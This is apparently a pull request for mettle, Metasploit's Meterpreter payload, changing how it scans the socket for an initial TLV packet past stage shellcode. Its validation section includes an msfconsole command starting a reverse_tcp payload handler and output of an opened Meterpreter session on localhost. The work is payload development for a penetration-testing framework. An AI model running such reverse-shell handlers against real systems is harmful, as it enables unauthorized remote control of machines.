### PR TITLE
sync tlv stream out of the stager output

### DIFF
--- a/mettle/src/mettle.c
+++ b/mettle/src/mettle.c
@@ -149,7 +149,7 @@ static void on_network_read(struct network_client *nc, void *arg)
 	struct tlv_packet *request;
 
 	if (m->first_packet) {
-		if (tlv_have_sync_packet(q)) {
+		if (tlv_have_sync_packet(q, "core_machine_id")) {
 			m->first_packet = false;
 		} else {
 			return;

--- a/mettle/src/tlv.c
+++ b/mettle/src/tlv.c
@@ -508,21 +508,21 @@ int tlv_dispatcher_process_request(struct tlv_dispatcher *td, struct tlv_packet 
 }
 
 /*
- * This works around garbage on the socket by attempting to read past it,
- * looking for an initial packet of length 73
+ * This works around garbage on the socket by attempting to read past it.
  */
-bool tlv_have_sync_packet(struct buffer_queue *q)
+bool tlv_have_sync_packet(struct buffer_queue *q, const char *method)
 {
 	bool found = false;
+	size_t method_len = strlen(method);
 
-	while (buffer_queue_len(q) >= 77) {
+	while (buffer_queue_len(q) >= 62 + method_len) {
 
 		struct tlv_xor_header h;
 		buffer_queue_copy(q, &h, sizeof(h));
 		uint32_t xor_key = ntohl(h.xor_key);
 		tlv_xor_bytes(xor_key, &h.len, sizeof(struct tlv_header));
 		size_t len = ntohl(h.len);
-		if (len == 73 && h.type == 0) {
+		if (len == (58 + method_len) && h.type == 0) {
 			found = true;
 			break;
 		}

--- a/mettle/src/tlv.h
+++ b/mettle/src/tlv.h
@@ -24,6 +24,8 @@ struct tlv_packet;
 
 struct tlv_packet *tlv_packet_new(uint32_t type, int initial_len);
 
+bool tlv_have_sync_packet(struct buffer_queue *q);
+
 struct tlv_packet * tlv_packet_read_buffer_queue(struct buffer_queue *q);
 
 void *tlv_packet_data(struct tlv_packet *p);

--- a/mettle/src/tlv.h
+++ b/mettle/src/tlv.h
@@ -24,7 +24,7 @@ struct tlv_packet;
 
 struct tlv_packet *tlv_packet_new(uint32_t type, int initial_len);
 
-bool tlv_have_sync_packet(struct buffer_queue *q);
+bool tlv_have_sync_packet(struct buffer_queue *q, const char *method);
 
 struct tlv_packet * tlv_packet_read_buffer_queue(struct buffer_queue *q);
 


### PR DESCRIPTION
This fixes #24. The problem is on connect, we are unconditionally given the stage shellcode from the handler, which we try to interpret as TLV output. C meterpreters simply read from the socket for 1 second before continuing, but the secondary TLS setup is what saves their bacon (since the handshake is client initiated).

In the mean time, this workaround scans the input stream for something that looks like an initial TLV packet, then continues from there.

# Validation Steps
 - [ ] start any reverse_tcp mettle payload stager you want (it really doesn't matter!)
 - [ ] point mettle (the standalone binary) at the stager - any one you like (I did OS X)
 - [ ] ensure it can read past the stage and find the first tlv packet in the stream

```
./msfconsole -qx 'use exploit/multi/handler; set payload linux/x86/mettle/reverse_tcp; set lhost 127.0.0.1; run'
payload => linux/x86/mettle/reverse_tcp
lhost => 127.0.0.1
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Starting the payload handler...
WARNING: Local file /Users/bcook/projects/metasploit-framework/data/mettle/cross-i486-linux-musl/bin/mettle.bin is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Sending stage (309716 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54786) at 2016-07-25 13:20:42 -0500

meterpreter >
meterpreter > sysinfo
Computer     : blah
OS           : Mac OS X Unknown (MacOSX 10.11.6)
Architecture : x86_64
Meterpreter  : x86/linux
```